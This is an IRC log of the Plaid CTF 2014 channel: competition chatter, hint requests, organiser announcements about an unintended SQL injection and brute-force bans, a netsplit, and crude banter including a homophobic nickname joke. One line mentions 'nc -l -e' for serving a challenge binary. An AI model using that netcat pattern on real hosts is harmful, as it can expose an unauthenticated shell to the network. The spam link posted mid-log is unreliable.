(20:22:07) (livinded) hmmm, maybe it's my side. Everything else is pretty snappy though
(20:22:16) (inter) largest dickhole award goes to
(20:22:19) (inter) *drumroll*
(20:22:29) (Zoro) you
(20:22:33) (inter) *drumroll pls*
(20:22:36) (Zoro) and a few other people
(20:22:42) |x_x| rolls a drum across the channel.
(20:22:42) (+clockish) no, I alone deserve this award.
(20:22:53) (Zoro) the kind folks here who put together this RSA
(20:23:01) (inter) clockish! contratulations clockish, recieve your prize @ pyjail
(20:23:06) (|x_x|) And not Multiplication is Hard?
(20:23:06) (+clockish) Zoro oh, that's tylerni7
(20:23:08) (|x_x|) >_>
(20:23:14) (+mserrano) blame me for that one
(20:23:15) (inter) <_<
(20:23:21) (Luffy) tyler quit with the rsa! nobody likes it XD
(20:23:25) (WuZ) mserrano: nice one
(20:23:29) (+mserrano) rsa is a wonderful problem
(20:23:32) +mserrano likes it
(20:23:35) (Zoro) >_>
(20:23:37) (Zoro) <_<
(20:23:40) (iago-x86) Either kappa is ridiculous for 275, or I'm missing something big
(20:23:42) (Zoro) *sees no one.*
(20:23:42) (inter) mserrano: the trolling became reallllllly real on that multiplication
(20:24:01) iago-x86 is banging his head
(20:24:01) (|x_x|) I still haven't gotten that one. >_>
(20:24:07) (jmgrosen) tylerni7: who wrote reekee?
(20:24:10) (+tylerni7) me
(20:24:11) (|x_x|) Evil arithmetic.
(20:24:17) (jmgrosen) ah :P
(20:24:20) (inter) mserrano: you should give him some hints
(20:24:21) (inter) like
(20:24:25) (inter) what is *
(20:24:28) (+tylerni7) jmgrosen: blame ricky for the idea though
(20:24:30) (|x_x|) Love?
(20:24:32) (+mserrano) iago-x86: our pwnables may have been slightly underestimated
(20:24:34) (+mserrano) we will see
(20:24:39) (|x_x|) Baby don't hurt me. Don't hurt me, no more.
(20:24:39) (Luffy) see iago
(20:24:43) (inter) dude
(20:24:44) (inter) i sang that
(20:24:44) (Luffy) youre banging you head
(20:24:48) (inter) a day ago
(20:24:51) (Luffy) cuz all you do is read shakespear
(20:24:52) (Luffy) e
(20:24:57) (iago-x86) mserrano: Heh
(20:24:57) (inter) in hope to escape
(20:24:58) (inter) pyjail
(20:25:04) (Luffy) maybe if you did some math you would know how to do multiplication is hard
(20:25:07) (inter) do you know kimchi?
(20:25:11) (inter) do you know bool go gi?
(20:25:14) (inter) do you know psy?
(20:25:14) (+mserrano) maybe I underestimated wheee as well
(20:25:16) (dkohlbre) mserrano: seriosuly, i have to install a whole new version of debian to get packages for a 100pt pwnable? no thanks :P
(20:25:22) (inter) do you know kal bi?
(20:25:30) (+mserrano) dkohlbre: lol
(20:25:38) (dkohlbre) stable forever
(20:25:38) (iago-x86) Kasalehlia: You don't really have to run it locally
(20:25:39) (oldtopman) inter: What's this about korea?
(20:25:54) (Zoro) you're gonna lose your neofrontal cortex after awhile iago-x86
(20:25:56) (inter) oldtopman: sweg
(20:26:03) (Zoro) gorea
(20:26:20) (+mserrano) at least I'm glad I named ezhp the way I did
(20:26:22) (+mserrano) and that it was in fact ez
(20:26:29) (Zoro) bull
(20:26:29) (Kasalehlia) iago-x86: thanks for the hint! do you mind telling me what to run?
(20:26:47) (Luffy) hes gonna tell you to run Othello
(20:26:50) (Luffy) don't listen to him
(20:26:54) (inter) mserrano: tiffany is yours too right?
(20:26:54) (dkohlbre) mserrano: it was, in fact, easy, minus the incredibly awful tooling problems i had on my end :/
(20:26:58) (iago-x86) Kasalehlia: Are you talking about tenement?
(20:26:59) (Luffy) run One Piece instead
(20:27:02) (iago-x86) Luffy: Okay, I get it. :P
(20:27:02) (+mserrano) inter: yes
(20:27:08) (inter) i knew it
(20:27:16) (Kasalehlia) iago-x86: i dont know, you just highlighted me
(20:27:39) (iago-x86) Kasalehlia: ooh, I assumed it was tenement, since that's a pwn 100
(20:27:49) nIck: (Luffy) is now known as (Shakespeare_is_g)
(20:27:50) (Kasalehlia) iago-x86: why me?
(20:27:54) (jarCrack) can you shaew rhw awevwe code for ezhp?
(20:27:58) (+mserrano) Kasalehlia: I think he meant to hilight dkohlbre and just mised the d
(20:27:59) nIck: (Shakespeare_is_g) is now known as (Shakespeareisgay)
(20:28:00) (dkohlbre) iago-x86: you meant me :P and yes, tenement
(20:28:00) (iago-x86) Probably failed autocomplete
(20:28:01) (+mserrano) jarCrack: wat
(20:28:03) qUit: (zorq) (1f1821dd@gateway/web/freenode/ip.31.24.33.221) Quit: Page closed
(20:28:07) (iago-x86) Sorry, it's been a long day :)
(20:28:08) (Shakespeareisgay) so uh
(20:28:09) (vladum_) who can i ask something about kpop?
(20:28:13) (+mserrano) vladum_: me
(20:28:16) (Kasalehlia) iago-x86: k =) it was nice talking to you
(20:28:22) nIck: (Shakespeareisgay) is now known as (ShakespeareIsGay)
(20:28:23) (+mserrano) inter: what made you think tiffany was me? :P
(20:28:31) (jarCrack) can you share the server code for ezhp?
(20:28:35) (ShakespeareIsGay) did you guys know that shakespeare was bisexual?
(20:28:41) (+mserrano) jarCrack: you get the binary
(20:29:04) (jarCrack) thats anotherone i think as it doesnt open port does it?
(20:29:15) (iago-x86) ezhp is my favourite level so far, cuz I finished it. :)
(20:29:21) (ShakespeareIsGay) wow
(20:29:25) (ShakespeareIsGay) *shakes head*
(20:29:30) (+mserrano) jarCrack: It's the same binar
(20:29:31) (WuZ) is the flag of harry_potter a picture of Emma Watson?
(20:29:32) (+mserrano) binary*
(20:29:37) (+mserrano) jarCrack: it's running under xinetd
(20:29:54) (tomcr00se) err, is harry potter doable?
(20:29:55) (+mserrano) so the fork/accept loop and the dup2'ing is done by xinetd
(20:30:24) (iago-x86) I use 'nc -l -e' for testing
(20:30:35) (jarCrack) ah i see
(20:30:36) (iago-x86) It's the same thing, but quicker for a quick test
(20:30:45) (ShakespeareIsGay) don't listen to him
(20:30:48) (+mserrano) tomcr00se: should be
(20:30:49) (jarCrack) should ve known this earlier :SS
(20:31:02) (_blasty_) 0x420 tym3
(20:31:06) (tjbecker) iago-x86: can't handle multiple clients, though
(20:31:32) (Zoro) a
(20:31:33) (ShakespeareIsGay) tjbecker: its because he likes shakespeare
(20:32:01) (+tylerni7) tomcr00se: awesie is throwing his soln at it now
(20:32:08) (iago-x86) Right, so it's no good for production
(20:32:13) (tjbecker) does anyone not like Shakespeare?
(20:32:14) nIck: (ShakespeareIsGay) is now known as (Luffy)
(20:32:14) (iago-x86) Just handy for quick testing
(20:32:20) (_blasty_) im not getting very far with haryr potter either
(20:32:24) (Luffy) lol
(20:32:41) (_blasty_) so im playing h4rry p0th34d ryte now, maybe it will improve things
(20:33:04) (+tylerni7) _blasty_: tomcr00se harry potter is working as intended
(20:33:11) (_blasty_) ok
(20:33:17) (+tylerni7) solution thrown at server, got key
(20:33:23) (_blasty_) notbad.jpg
(20:33:27) (+tylerni7) then md5d the services and verified they matched
(20:33:39) (+tylerni7) (awesie did this, not me, I'm not cool enough)
(20:33:43) (+tylerni7) anyway, should be good :)
(20:34:04) (WuZ) I think tomcr00se would be more sucessfull on a impossible_mission chall
(20:34:08) WuZ best joke eva
(20:35:37) (Luffy) atekemo yume wo
(20:35:41) (Luffy) kakeatsume
(20:35:51) (Luffy) sagashimono sagashi ni yuku no sai
(20:35:56) (Luffy) One Piece!
(20:36:15) (+clockish) less cartoons, more hacking plz
(20:36:17) (Adran) why is freya 404ing
(20:36:30) (Luffy) not a cartoon :(
(20:36:33) (Luffy) its anime :)
(20:36:49) (+mserrano) Adran: one of the servers has it the other doesn't
(20:36:57) (Adran) is that a feature?
(20:37:07) (+mserrano) nah it's a mistake
(20:37:09) (+mserrano) thanks for pointing it out
(20:37:13) (+mserrano) refresh a couple times and you should get it
(20:37:20) (|x_x|) So a Japanese cartoon?
(20:37:54) (Luffy) .... be quite lower life form
(20:38:01) (Adran) mserrano: yay that worked now
(20:38:13) (Luffy) quiet*
(20:38:14) (+mserrano) Adran: ok it should stop 404 now
(20:40:05) qUit: (rliu) (ad3d971b@gateway/web/freenode/ip.173.61.151.27) Ping timeout: 240 seconds
(20:40:31) (iago-x86) I've been stuck on kappa for awhile.. is there somebody I can explain what I'm doing to, to see if I'm on the right track?
(20:40:50) (+mserrano) iago-x86: you can pm me
(20:40:53) (iago-x86) Thanks!
(20:42:28) qUit: (BinaryCrystal) (
[email protected]) Read error: Connection reset by peer
(20:42:56) (Luffy) youre welcome :)
(20:46:28) (Luffy) youre right touchscreen laptops are the besst
(20:50:05) qUit: (pctf533) (46b9d762@gateway/web/freenode/ip.70.185.215.98) Ping timeout: 240 seconds
(20:50:35) qUit: (pctf376) (46b9d762@gateway/web/freenode/ip.70.185.215.98) Ping timeout: 240 seconds
(20:53:24) jOin: (woot_) (83c2fd17@gateway/web/freenode/ip.131.194.253.23)
(20:54:13) (woot_) love the doge :)
(20:54:59) (+clockish) i love the doge too
(20:55:05) (+clockish) wow, many love
(20:55:17) (Adran) much doge
(20:56:44) (+clockish) tomcr00se: is multiplication hard?
(20:57:53) (+mserrano) \o/ 0xffa
(20:58:00) (+mserrano) 2 solves in gcc
(20:58:08) (+mserrano) on*
(20:58:35) jOin: (cmplxen) (~cmplxen@unaffiliated/cmplxen)
(20:59:27) (woot_) I love doge...collecting dogecoin atm
(20:59:35) qUit: (wolfpack) (9807491f@gateway/web/freenode/ip.152.7.73.31) Ping timeout: 240 seconds
(20:59:54) (+clockish) how do i buy dogecoin with bitcoin
(21:00:01) (+clockish) i wanna go all in to doge! :P
(21:00:05) (woot_) you can use an exchange :)
(21:00:09) (woot_) vault of satoshi maybe
(21:00:15) (+clockish) that sounds hard
(21:00:23) (+mserrano) how do I buy dogecoin
(21:00:25) (+mserrano) with empty promises
(21:00:30) (+clockish) I don't trust exchanges
(21:00:38) (woot_) I only have a few dogecoin
(21:00:51) (saelo) anyone I can talk to about ezhp?
(21:00:51) (+mserrano) exchanges bleed coins
(21:00:55) (+mserrano) saelo: pm me
(21:00:56) (ryan-c) i keep my bitcoin under my mattress
(21:01:04) (ryan-c) it's safe there
(21:01:10) (woot_) and you can pay me in empty promises
(21:01:27) (woot_) Anyone actually mining?
(21:01:37) (+mserrano) how do you mine dogecoin
(21:01:48) (woot_) with cgminer or cudaminer :)
(21:02:00) (woot_) and then you throw your graphics card at it
(21:02:17) (woot_) http://hugelolcdn.com/i/240652.gif
(21:02:18) (ryan-c) are nvidia cards actually any good at gimped scrypt?
(21:02:38) (woot_) the new nvidia architecture coming out got a lot better at mining
(21:03:19) (woot_) this steg thing is not as easy as I thought for 100 points..or I'm overlooking something
(21:03:23) (ryan-c) who's challenge is curlcore?
(21:03:34) (+mserrano) ryan-c: clockish
(21:04:02) jOin: (Tokage-Kira) (uid15875@gateway/web/irccloud.com/x-adqrbntyqeceebtc)
(21:06:22) (woot_) Do there happen to be any former Trinity students at CM?
(21:07:25) (+tylerni7) trinity students?
(21:08:01) (woot_) Yeah, from Trinity university
(21:08:11) (+mserrano) beats me
(21:08:34) (+frozencemetery) mserrano: they do? The monsters!
(21:08:47) (+mserrano) pls.
(21:09:42) (+clockish) you LIKE IT when they do?
(21:10:01) (+frozencemetery) clockish: well, that's what Tuesday's for
(21:10:27) (+clockish) oh right, BDSM tuesdays, forgot.
(21:10:43) (altf4) I'm starting to think that I don't even know what a cat is anymore...
(21:10:52) (+tylerni7) WHATS CAT?
(21:10:59) (+frozencemetery) altf4: XARGS CAT IS WATCHING YOU
(21:11:00) (+tylerni7) or is it... WHAT? SCAT?
(21:11:44) (+frozencemetery) tylerni7: I'd think you'd know all about what scat is
(21:12:20) qUit: (oclarocque_) (628fd7e4@gateway/web/freenode/ip.98.143.215.228) Quit: Page closed
(21:13:19) (dedede) more crypto pls
(21:13:49) (namrog84) arghhhh my last hope, has failed
(21:14:05) qUit: (Luffy) (47cfa62b@gateway/web/freenode/ip.71.207.166.43) Ping timeout: 240 seconds
(21:14:23) qUit: (bwn3r) (~n00b13@unaffiliated/nitsua) Ping timeout: 245 seconds
(21:16:56) (+mserrano) dedede: have you solved rsa and whee?
(21:16:56) qUit: (eastwolf_) (
[email protected]) Read error: Connection reset by peer
(21:18:27) qUit: (cmplxen) (~cmplxen@unaffiliated/cmplxen) Quit: leaving
(21:19:15) jOin: (kilmey) (5775c785@gateway/web/freenode/ip.87.117.199.133)
(21:19:53) (kilmey) how on hell so many teams solved whatscat... it's hard...
(21:20:05) qUit: (dedede) (d4293493@gateway/web/freenode/ip.212.41.52.147) Ping timeout: 240 seconds
(21:20:12) (kilmey) more hard than other webs here...
(21:22:40) (+tylerni7) I mean, it's more points too :)
(21:23:05) (kilmey) but only +100 :P
(21:24:37) (altf4) (╯°□°)╯︵ ┻━┻)
(21:24:43) (kilmey) eg.g web200 (kpop) tooks about 15-20 minutes to solve it
(21:24:54) (kilmey) eg. *took
(21:25:31) (kilmey) reekee was pretty harder, but still not as hard as whatscat )
(21:25:41) jOin: (albntomat0) (8c201003@gateway/web/freenode/ip.140.32.16.3)
(21:26:59) (kilmey) tylerni7: who's the author?
(21:27:06) (+tylerni7) me
(21:27:20) (kilmey) ok to pm?
(21:27:26) (+tylerni7) sure :)
(21:27:33) qUit: (makler2004) (
[email protected]) Remote host closed the connection
(21:27:59) (kmowery) pro tip: if you mean q, don't type p
(21:29:20) jOin: (deder) (d4293493@gateway/web/freenode/ip.212.41.52.147)
(21:29:51) jOin: (cmplxen) (~cmplxen@unaffiliated/cmplxen)
(21:32:36) (BinaryCrystal) is the user ppp in use?
(21:32:41) qUit: (chrissing) (
[email protected]) Remote host closed the connection
(21:32:57) (+frozencemetery) probably; it's a big network
(21:32:58) (BinaryCrystal) for ssh?
(21:34:05) qUit: (cmplxen) (~cmplxen@unaffiliated/cmplxen) Client Quit
(21:38:28) qUit: (kilmey) (5775c785@gateway/web/freenode/ip.87.117.199.133) Quit: Page closed
(21:39:45) (arthurdent) BinaryCrystal: ssh?
(21:39:45) qUit: (vap0r) (d06bcefc@gateway/web/freenode/ip.208.107.206.252) Quit: Page closed
(21:42:08) (namrog84) for the pwnables and ones with ip/ports, what am i supposed to connect to them with? or is that part of the challenge?
(21:42:18) (tomcr00se) a web browser
(21:42:40) (+clockish) namrog84: a tcp connection, e.g. "nc xx.xx.xx.xx port"
(21:42:41) (namrog84) i mean like tenement (100pt) 54.237.240.143:9999 web browser doesnt work
(21:42:49) (namrog84) oh ok, thanks thats what i was looking for
(21:42:59) (namrog84) aha! that worked, thanks lots
(21:43:04) +ricky debates between releasing his cool problem now or saving it for next year
(21:43:21) (dct1) I connect with a toaster
(21:43:23) (+frozencemetery) ricky: RELEASE THE KRAKEN
(21:43:48) (+ricky) Yeah, on one hand I don't want to waste it by having nobody solve it (like almost 50% of my past pctf challenges)
(21:43:52) (+ricky) On the other hand it's my only problem this year
(21:44:02) (_blasty_) :-X
(21:45:52) (+ricky) Hmmmm....
(21:46:08) (+ricky) Yeah, and it sucks for the people who are sleeping to release something halfway in
(21:46:18) (+ricky) Well sometihng long at least
(21:47:17) (nopple) ricky: as long as it's not x64 c++ :)
(21:47:32) (nopple) ricky: or at least worth enough points for the effort
(21:48:01) (x56) if it's like usbdude last year, bring it on :D
(21:48:07) (+tylerni7) it would be worth quite a few points
(21:48:12) (x56) would love some AVR
(21:48:12) (+clockish) nopple: ...
(21:48:15) (x56) ARM, MIPS
(21:48:16) (x56) w/e
(21:48:37) (nopple) clockish: ;)
(21:48:38) (+clockish) nopple: we'll it'd be worth enough points :P
(21:49:11) jOin: (pctf663) (81f4f232@gateway/web/freenode/ip.129.244.242.50)
(21:49:51) jOin: (xman) (0ea122c5@gateway/web/freenode/ip.14.161.34.197)
(21:50:22) qUit: (lkajfpoa) (
[email protected]) Quit: Http://www.ZeroIRC.NET ¢Æ Zero IRC ¢Æ Ver 2.9G
(21:52:32) (xman) hello any op?
(21:53:09) (arthurdent) slarks op
(21:53:42) (lkwpeter) who can i pm for mtpox ?
(21:53:56) (+tylerni7) lkwpeter: you can pm me
(21:54:01) (+tylerni7) xman: I am op
(21:57:30) (+ricky) nopple: I think the points would be worth the effort :-P
(21:58:27) qUit: (lkwpeter) (
[email protected]) Read error: Connection reset by peer
(21:58:30) ([ToH]rbino) in which format is the flag for crypto200?
(21:58:36) (pipecork) clockish: this js is great. bravo
(21:59:10) qUit: (chrissing) (
[email protected]) Remote host closed the connection
(21:59:42) (+clockish) pipecork: i are a js mastar!
(21:59:55) qUit: (woot_) (83c2fd17@gateway/web/freenode/ip.131.194.253.23) Quit: Page closed
(22:00:00) (ebeip90) i have it on good authority that clockish has no idea what he's doing >_>
(22:00:11) (+frozencemetery) #rekt
(22:00:47) (+clockish) :3
(22:03:37) jOin: (hadahash) (uid25580@gateway/web/irccloud.com/x-wsnoahgwqigwbhij)
(22:04:53) (fasmotol) Can someone tip in what linux can i launch pwn100 without getting 'error while loading shared libraries: libseccomp.so.2: cannot open shared object file: No such file or directory'. i cannot fix this issue
(22:06:01) (fuzyll) fasmotol: what shared library are you missing, based on that error message?
(22:06:36) qUit: (Zoro) (328200f8@gateway/web/freenode/ip.50.130.0.248) Ping timeout: 240 seconds
(22:06:46) (codequaid) Could someone give me a tip on reekee? I can't figure out the path to settings.py on the target machine, but i have everything else figured out.
(22:07:12) (+tylerni7) codequaid: it can be found, deterministically with 0 guessing
(22:07:14) +tylerni7 shrugs
(22:07:23) (+tylerni7) and you should pm for things like this
(22:07:27) (+tylerni7) not mention in main channel :)
(22:09:14) (solo_) 0xffa == eindbazen?
(22:11:06) qUit: (xman) (0ea122c5@gateway/web/freenode/ip.14.161.34.197) Ping timeout: 240 seconds
(22:11:06) jOin: (eastwolf_) (ad42d345@gateway/web/freenode/ip.173.66.211.69)
(22:11:49) (hadahash) hi, any flag format i should know of?
(22:12:09) (+tylerni7) hadahash: try with everything you see
(22:12:12) (+tylerni7) including pctf{} and flag{}
(22:12:16) (+tylerni7) if you don't see this, don't include it
(22:12:50) (hadahash) tylerni7: ah, alright, thanks :)
(22:15:37) (supersat) can I ping someone about web150 before I go on a wild goose chase?
(22:15:50) (supersat) aka mtpox
(22:16:29) (+tylerni7) supersat: pm me
(22:16:57) ([SH]mom) Is rendezvous currently working as intended?
(22:17:23) (deder) i want to sleep
(22:17:30) (+frozencemetery) [SH]mom: yes
(22:17:33) (Adran) sleep challenge
(22:17:38) (deder) hye
(22:17:40) (+dickoff) sleep is good
(22:17:41) (deder) ye
(22:18:19) (+frozencemetery) sleep(5)
(22:18:47) (ronbarrey) any1 got any suggestions for multiplication is hard?
(22:19:17) (ronbarrey) also stuck on admin.php for web150
(22:19:46) (dct1) What time does the ctf officially end?
(22:19:59) (+houqp) [SH]mom: yes
(22:19:59) (arthurdent) 5pm EST tomorrow iirc
(22:20:12) qUit: (phiber__) (
[email protected]) Read error: Connection reset by peer
(22:20:15) (+tylerni7) yep 5pm EST
(22:20:18) (Adran) tylerni7: mind if I see if i am on the right track for mtpox?
(22:20:20) (dct1) gracias
(22:20:28) (ronbarrey) sure
(22:20:33) (+tylerni7) Adran: you can pm me and ask
(22:20:34) (+houqp) [SH]mom: pm me if you think you think you have the correct solution, but not getting the flag
(22:21:52) jOin: (PHLAK) (~chris@unaffiliated/phlak)
(22:27:26) qUit: (trelgak) (
[email protected]) Read error: Connection reset by peer
(22:33:16) iNfo: These users have been split from (#pctf): poppopret, irdan, hellok, nurfed_, Valion_, Atlantic777, zoomequipd, dudes, gsilvis_, ricky, xyrex, WhizzMan, BrianWGray, kmowery, ChanServ, hasB4K, maikol, marc-etienne, thecatbot, [pwn]haabb, fser, upb, albntomat0, slipper, lanjelot, schrodinger, colona, x56, houqp, duper, ysje, _joeje_, eastwolf_, Redford, Im11Plus1, khloe, Phshap, [NULLify]Chaplin, tweek_, j8, marcan, ius, Im11Plus, brogle, ylujion, awesie, brambit_, zedsdeadbaby, nbdy, ryan-c, nadar, ktrask, atem, jduck, [hfs]capsl, awe, Nothingness, Valodim, Yerer, pnX, stach, phish51, sh8, LuckyY, mathiasbynens, SLAZ, [SH]mom, pcc7, pd7, computerality, alexwebr, pctf663, chuckleberry, auscompgeek, lavish, deder, whois, alvoha, abcert, dunamis, moki, jmgrosen, bata, eastwolf__, dkohlbre, sven, saelo, netsurf3, audioPhil, espes__, Barbara_Tracy, q3k, altf4, hellman, Amnesia, talanor, tyage, morla, dnivra, wapiflap1, soleblaze, j00ru, chunderstruck1, DrunkenPanda, Gynvael, blankwall, clockish, bs`, HeadHunter, haoz, Xor0X, zardus, allanlw, hoxy, dwn, kurti, Tokage-Kira, EdHunter, Apple_Eater, piroko, KT, dbuq, larsan, psifertex, mserrano, rvpersie, atdog, neodyblue, cychao, javex, PHLAK, kevin``, synthverity, depierre, adam_i, sqrts|stephan, pctf_scoreboard, [ToH]rbino, plo, bool_101, duckyTS, handlr, wyatt_earp, Pitr_, Lopi, hbw, suto_, [pwn]TM, mak`, gpp, robbje, acez, Otacon22, HENLEYbls, choppers, l0l0l, cybercybercyber, [int3]romansoft, dim_maK, cd1zz, ari_, NotoriousHUB, fixception, _275o, plaintext, fasmotol, k00mi, asby, [euronop]skab, kereoz, guy_, Kasalehlia, Cimmi, Comrade_Badger, epochtato, namrog84, thomakj, architekt, mike_pizza, akiym_, tylerni7, Fireghost, s_kunk, ninjafish, kalenz, xp45g, Galactic, RyanWithZombies, kiwhacks, kurtisebear, Aristokratov, warrick, asmoday, BiDOrD, mrsmith67, mak, snoopybbt, erye, cool_guy, knuckles, dzeta, spectralsun, mongo12, Holographic, dwlewis, nUl1, nofiki1, g0tmi1k, bobsteam, supersat, HighFiveBell, dickoff, zoidberg-, dct1, _ML, nopple, marcoscars02, f00b4r_, nopnopgo1se, synick, criple_ripper, almac, jix, cai_, Yolanda, majuscule, comawill, saxx, ronbarrey, dcbz_, jarCrack, BinaryCrystal, a5m0, frozencemetery, arthurdent, NK_, X-N2O_, Nanomebia, osandov, grimmlin_, ircc3, whos_tyler, torvos, o1e6, isra17, codequaid, c671m, oldtopman, Lympho|DrgnS, smd, tomcr00se, dropkick_, factoreal, [2]Knight, jjk_, wonder-defbra, briezer, TobalJackson, zoku, DKay, fester, ebeip90, wmliang_, _bcc, xichzo, WuZ, skier_, haakjes, danitorwS, maurer, Reinhart, Adrastei, Yen1, devotchka, ikari, pipecork, nope_, nagi_, dave5623, toxickappa, mischa__, OwariDa, jinblack, Matir, Sin__, tsuro, qll, solo_, _blasty_, connection, abuss, MavJS - check netsplits window for details!
(22:39:16) (stypr) wow
(22:39:20) (stypr) splitsplitsplit
(22:39:29) qUit: (Adran) (adran@botters/staff/adran) Quit: Este é o fim.
(22:39:37) iNfo: These users have rejoined (#pctf): cai_ - check netsplits window for details!
(22:41:28) jOin: (x7r0n) (x7r0n@2002:75fe:6b04::75fe:6b04)
(22:43:07) (stypr) that damn javascript
(22:43:11) (stypr) i mean nodeja
(22:43:14) (stypr) nodejs*
(22:44:24) iNfo: These users have rejoined (#pctf): epochtato - check netsplits window for details!
(22:46:31) iNfo: These users have rejoined (#pctf): arthurdent - check netsplits window for details!
(22:48:38) qUit: (cai_) (~cai_@2001:19f0:1604:3ede:250:56ff:feae:66de) Quit: Bye
(22:48:59) jOin: (cai_) (~cai_@2001:19f0:1604:3ede:250:56ff:feae:66de)
(22:53:56) iNfo: These users have rejoined (#pctf): Sin__ - check netsplits window for details!
(22:58:53) qUit: (cai_) (~cai_@2001:19f0:1604:3ede:250:56ff:feae:66de) Quit: Bye
(22:59:49) qUit: (gut) (
[email protected]) Quit: Textual IRC Client: www.textualapp.com
(23:10:27) nIck: (z0) is now known as (awesie)
(23:10:28) (awesie) if you want active help on irc, please join sendak.freenode.net and follow @PlaidCTF
(23:10:44) (awesie) PSA from the why-does-freenode-break-during-pctf department
(23:13:39) (x7r0n) 2048 bit rsa for forensics ? how am i gonna crack it :-(
(23:15:09) (awesie) x7r0n: if you want active help on irc, please join sendak.freenode.net
(23:21:24) (x7r0n) is it official pctf channel @awesie
(23:21:50) (x7r0n) i thot this was official channel
(23:22:30) (x7r0n) btw any1 whom i can ping about forensics250
(23:22:44) (awesie) x7r0n: freenode netsplit
(23:22:55) (awesie) so there are now 8 different #pctf channels
(23:23:02) (awesie) rather than the 1 that used to exist
(23:23:26) (awesie) if you checked twitter (@PlaidCTF), we are asking people to join irc://sendak.freenode.net/pctf
(23:24:29) * Disconnected
Session Close: Sat Apr 12 23:24:30 2014
Session Start: Sat Apr 12 23:24:30 2014
Session Ident: #pctf
(23:24:32) rAw (0) LS account-notify extended-join identify-msg multi-prefix sasl
(23:24:32) rAw (0) ACK multi-prefix
(23:24:33) rAw (265) 6290 7379 Current local users 6290, max 7379
(23:24:33) rAw (266) 6290 95150 Current global users 6290, max 95150
(23:24:33) rAw (250) Highest connection count: 7380 (7379 clients) (181378 connections received)
(23:24:34) * Attempting to rejoin channel #pctf
(23:24:40)
(23:24:40) jOined: (#pctf)
(23:24:40)
(23:24:40) tOpic: ([Plaid CTF 2014 - play.plaidctf.com] 24 Hours left | $20 added to each cash prizes so far (from CHANCE card))
(23:24:40) sEt by: (cai_!~cai_@2001:19f0:1604:3ede:250:56ff:feae:66de) on (Saturday, April 12th 2014, 16:41:38)
(23:24:40) uSers: 48 users, 0 ops (0%), 2 voiced (4%), 46 regulars (96%)
(23:24:40) sYnc time: (0.06) second(s)
(23:24:40)
(23:26:54) (ricky) ANNOUNCE: The SQL injection in the ponies site was unintentional - it has been removed.
(23:27:17) (ricky) ANNOUNCE: SQL injection doesn't actually help you get anywhere on the problem, so people who found it didn't get any advantage
(23:27:23) (ricky) ANNOUNCE: Sorry for the inconvenience
(23:28:12) (|x_x|) aww....
(23:29:05) iNfo: These users have rejoined (#pctf): jmgrosen - check netsplits window for details!
(23:29:17) (inter) CLOCKISH
(23:29:18) (inter) YOU
(23:29:23) (inter) c
(23:32:59) (x7r0n) whom can i ask about forensics250 ?
(23:33:04) (x7r0n) i have few doubts
(23:33:09) (x7r0n) curlcore
(23:36:19) (ricky) Would be interested in hearing if anybody finds anything else interesting with bronies :-P
(23:37:47) (x7r0n) tylerni7 u der ?
(23:38:04) (ricky) I think tylerni7 is sleeping
(23:38:17) (clockish) x7r0n I can answer
(23:38:21) (clockish) pm
(23:39:26) (x7r0n) ty :-)
(23:39:53) qUit: (inter) (
[email protected]) Quit: HydraIRC -> http://www.hydrairc.com <- Chicks dig it
(23:45:00) jOin: (stypr_irc) (sid16290@gateway/web/irccloud.com/session)
(23:45:16) nIck: (stypr_irc) is now known as (stypr_irccloud)
(23:52:22) (ricky) IPs that are banned for path brute forcing: 46.0.46.243, 140.112.4.192
(23:52:31) (ricky) Please contact if you want to stop doing that and get unbanned
(23:54:23) qUit: (jmgrosen) (
[email protected]) Quit: ERC Version 5.3 (IRC client for Emacs)
(23:56:14) (ricky) ANNOUNCE: /server-status is also not relevant to solving bronies
(23:56:48) (jmgrosen) gaaaah
(23:56:55) (jmgrosen) I'm tearing my hair out on kpop by now
(23:58:13) (ricky) jmgrosen: Try bronies on for size :-P
(23:58:20) (ricky) It's a fantastic problem in my totally nonbiased opinion
(23:58:34) (jmgrosen) ricky: hm, wonder who wrote that one...
(23:58:34) qUit: (duckyTS) (
[email protected]) Read error: Connection reset by peer
(23:58:48) (houqp_) jmgrosen: mserrano
(23:59:04) (jmgrosen) my hypothesis was wrong, then :P
(23:59:51) (ricky) (houqp_ is kidding :-P)
(00:00:00) iNfo: Day changed to (Sunday, April 13th 2014).
Session Time: Sun Apr 13 00:00:00 2014
(00:00:03) (ricky) Though this problem did have input from both tylerni7 and awesie_
(00:00:21) (jmgrosen) ah
(00:00:30) (jmgrosen) my sarcasm-over-irc detecter must be broken
(00:01:31) nIck: (dnivra) is now known as (dnivra_)
(00:03:23) (sibios) ricky, quick question RE:bronies. Can I pm?
(00:03:34) (ricky) sibios: Yup feel free to pm
(00:04:10) (Fancy18) Here some videos. I hope you like them! http://bit.ly/1gAh6Jy
(00:04:27) (ricky) ^spammmmm
(00:04:52) (clockish) I LIKE SPAM
(00:05:02) (hellman) o/
(00:05:06) (clockish) hi hellman
(00:05:13) (stypr_irccloud) i hate pony
(00:05:20) qUit: (Fancy18) (
[email protected]) Read error: Connection reset by peer
(00:05:21) (stypr_irccloud) i think we *must* bruteforce.
(00:05:27) (clockish) stypr_irccloud: wrong
(00:06:32) (hellman) open the last crypto :(
(00:06:55) (pd7) tylerni7: you available?
(00:06:59) (ricky) ANNOUNCE: Just to clarify, both flags for bronies are behind the login page - the pony site doesn't have any flags in it
(00:07:43) (pd7) or anyone that could point me in the right direction for mtpox
(00:07:45) (clockish) hellman: pwn harder first :P
(00:07:51) (pd7) I was able to get past the admin login
(00:07:57) (clockish) pd7: I can help with mtpox
(00:08:01) (ricky) Solve the wonderful web :-P I love web!
(00:08:06) (pd7) but I'm confused about what you're looking for as far as the key goes
(00:08:10) (pd7) clockish: can I pm you?
(00:08:14) (clockish) yes
(00:08:17) (pd7) thanks
(00:09:07) (iago-x86) Hmm @ harry_potter
(00:09:20) (iago-x86) Once again, seems more difficult than 150.. pwnage levels are hard. :)
(00:09:43) (ricky) Yeah, in retrospect, we probably undervalued it, sorry
(00:09:52) (ricky) My fault for that
(00:10:06) (iago-x86) Heh
(00:10:27) (iago-x86) It's one of those levels where I just plain don't know what to do.. I see the obvious vuln, but I don't think it's exploitable
(00:10:31) (iago-x86) I like the monkeys, though. :)
(00:14:12) (iago-x86) Woah, there's a Windows challenge!
(00:15:24) (ricky) Heh yeah, first one in ages
(00:15:31) (ricky) There's also an extra special web challenge
(00:15:35) (ricky) You should look at it :-P
(00:15:43) (ricky) It's very special
(00:15:44) nIck: (monsi) is now known as (16WAAD756)
(00:15:45) nIck: (sibios) is now known as (16WAAD8T9)
(00:15:46) nIck: (clockish) is now known as (16WAAD7AR)
